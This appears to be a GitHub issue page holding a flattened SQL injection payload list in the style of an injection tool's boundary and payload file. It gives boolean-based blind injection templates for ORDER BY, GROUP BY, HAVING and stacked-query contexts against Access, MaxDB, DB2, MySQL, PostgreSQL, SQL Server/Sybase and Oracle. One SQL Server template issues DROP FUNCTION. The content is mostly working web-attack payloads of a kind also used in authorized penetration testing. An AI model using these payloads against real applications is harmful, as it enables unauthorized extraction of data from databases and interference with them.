<title>Microsoft Access boolean-based blind - ORDER BY, GROUP BY clause</title> 1 4 1 2,3 1 ,IIF([INFERENCE],1,1/0) ,IIF([RANDNUM]=[RANDNUM],1,1/0) ,IIF([RANDNUM]=[RANDNUM1],1,1/0)
Microsoft Access
<title>Microsoft Access boolean-based blind - ORDER BY, GROUP BY clause (original value)</title> 1 5 1 2,3 1 ,IIF([INFERENCE],[ORIGVALUE],1/0) ,IIF([RANDNUM]=[RANDNUM],[ORIGVALUE],1/0) ,IIF([RANDNUM]=[RANDNUM1],[ORIGVALUE],1/0)
Microsoft Access
<title>SAP MaxDB boolean-based blind - ORDER BY, GROUP BY clause</title> 1 4 1 2,3 1 ,(CASE WHEN [INFERENCE] THEN 1 ELSE NULL END) ,(CASE WHEN [RANDNUM]=[RANDNUM] THEN 1 ELSE NULL END) ,(CASE WHEN [RANDNUM]=[RANDNUM1] THEN 1 ELSE NULL END)
SAP MaxDB
<title>SAP MaxDB boolean-based blind - ORDER BY, GROUP BY clause (original value)</title> 1 5 1 2,3 1 ,(CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE NULL END) ,(CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE NULL END) ,(CASE WHEN [RANDNUM]=[RANDNUM1] THEN [ORIGVALUE] ELSE NULL END)
SAP MaxDB
<title>IBM DB2 boolean-based blind - ORDER BY clause</title> 1 4 1 3 1 ,(SELECT CASE WHEN [INFERENCE] THEN 1 ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1) ,(SELECT CASE WHEN [RANDNUM]=[RANDNUM] THEN 1 ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1) ,(SELECT CASE WHEN [RANDNUM]=[RANDNUM1] THEN 1 ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1)
IBM DB2
<title>IBM DB2 boolean-based blind - ORDER BY clause (original value)</title> 1 5 1 3 1 ,(SELECT CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1) ,(SELECT CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1) ,(SELECT CASE WHEN [RANDNUM]=[RANDNUM1] THEN [ORIGVALUE] ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1)
IBM DB2
<title>HAVING boolean-based blind - WHERE, GROUP BY clause</title> 1 3 1 1,2 1 HAVING [INFERENCE] HAVING [RANDNUM]=[RANDNUM] HAVING [RANDNUM]=[RANDNUM1] <title>MySQL >= 5.0 boolean-based blind - Stacked queries</title> 1 4 1 1-8 1 ;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END) ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END) # ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)
MySQL >= 5.0
<title>MySQL < 5.0 boolean-based blind - Stacked queries</title> 1 5 1 1-8 1 ;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END) ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END) # ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)
MySQL < 5.0
<title>PostgreSQL boolean-based blind - Stacked queries</title> 1 3 1 1-8 1 ;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END) ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/(SELECT 0) END) -- ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)
PostgreSQL
<title>PostgreSQL boolean-based blind - Stacked queries (GENERATE_SERIES)</title> 1 5 1 1-8 1 ;SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1 ;SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1 -- ;SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1
PostgreSQL
<title>Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF)</title> 1 3 1 1-8 1 ;IF([INFERENCE]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR] ;IF([RANDNUM]=[RANDNUM]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR] -- ;IF([RANDNUM]=[RANDNUM1]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]
Microsoft SQL Server Sybase
<title>Microsoft SQL Server/Sybase boolean-based blind - Stacked queries</title> 1 4 1 1-8 1 ;SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END) ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END) -- ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)
Microsoft SQL Server Sybase
<title>Oracle boolean-based blind - Stacked queries</title> 1 4 1 1-8 1 ;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL -- ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL
Oracle
<title>Microsoft Access boolean-based blind - Stacked queries</title> 1 5 1 1-8 1 ;IIF([INFERENCE],1,1/0) ;IIF([RANDNUM]=[RANDNUM],1,1/0) %16 ;IIF([RANDNUM]=[RANDNUM1],1,1/0)
Microsoft Access
<title>SAP MaxDB boolean-based blind - Stacked queries</title> 1 5 1 1-8 1 ;SELECT CASE WHEN [INFERENCE] THEN 1 ELSE NULL END ;SELECT CASE WHEN [RANDNUM]=[RANDNUM] THEN 1 ELSE NULL END -- ;SELECT CASE WHEN [RANDNUM]=[RANDNUM1] THEN 1 ELSE NULL END
SAP MaxDB

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@ron190 @selectfromblackhydra